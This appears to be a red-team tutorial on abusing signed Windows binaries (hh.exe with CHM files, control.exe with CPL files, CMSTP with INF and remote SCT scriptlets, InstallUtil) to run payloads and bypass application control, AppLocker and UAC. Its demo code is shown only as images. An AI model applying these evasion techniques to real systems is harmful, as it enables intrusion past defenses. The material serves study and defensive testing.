Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. CHM content is displayed using underlying components of the Internet Explorer browser loaded by the HTML Help executable program (hh.exe).

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe.

Example

In this demo a simple CHM file is created and executed; I have added references to manually and automatically create these payloads.

We will use Out-CHM to create the payload, by adding the payload parameter where it is located and the hh.exe utility for it to compile it in a format that hh.exe is capable of understanding.

image

Once this is done, execution is simple.

image

 

Control Panel

Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.

Control Panel items are registered executable (.exe) or Control Panel (.cpl) files; the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.

Malicious Control Panel items can be delivered via Phishing campaigns or executed as part of multi-stage malware. Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.

Adversaries may also rename malicious DLL files (.dll) with Control Panel extensions (.cpl) and register them under HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export a CPlApplet function, they are loaded and executed through their DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.

Example

In this demo we will compile code to create a functional cpl file format. This is not necessary, as these can also be in exe format, but on this occasion we are using this for demo purposes and also to demonstrate the different types of executable formats.

image

Once compiled we can execute with a double-click on the file or simply using control.exe; you will need to add the full path of the payload.

Demo

 

CMSTP

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.

Example

This one was a little tricky, as we needed to create an inf file but also have an sct file waiting for us remotely to execute code, as this will use scrobj.dll to execute our code as well.

image

Then execution should be simple

image

Careful, as this will create a VPN connection and leave a shortcut on the Desktop as well. A way to avoid this is to actually gain a shell (PowerShell, CMD); in this demo the reason (I think?) it is being left behind is because execution finalizes and doesn't stay in a continuous running state such as when receiving a shell.

 

InstallUtil

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)].

Example

In the following example I created a C# binary that will execute calc. After looking at some examples (pentestlab), mainly it says that it will execute binaries in C# code, so by this I compiled it and used InstallUtil to execute the binary itself.

This seems to be true if you don't compile it correctly.

image

Demo

image

 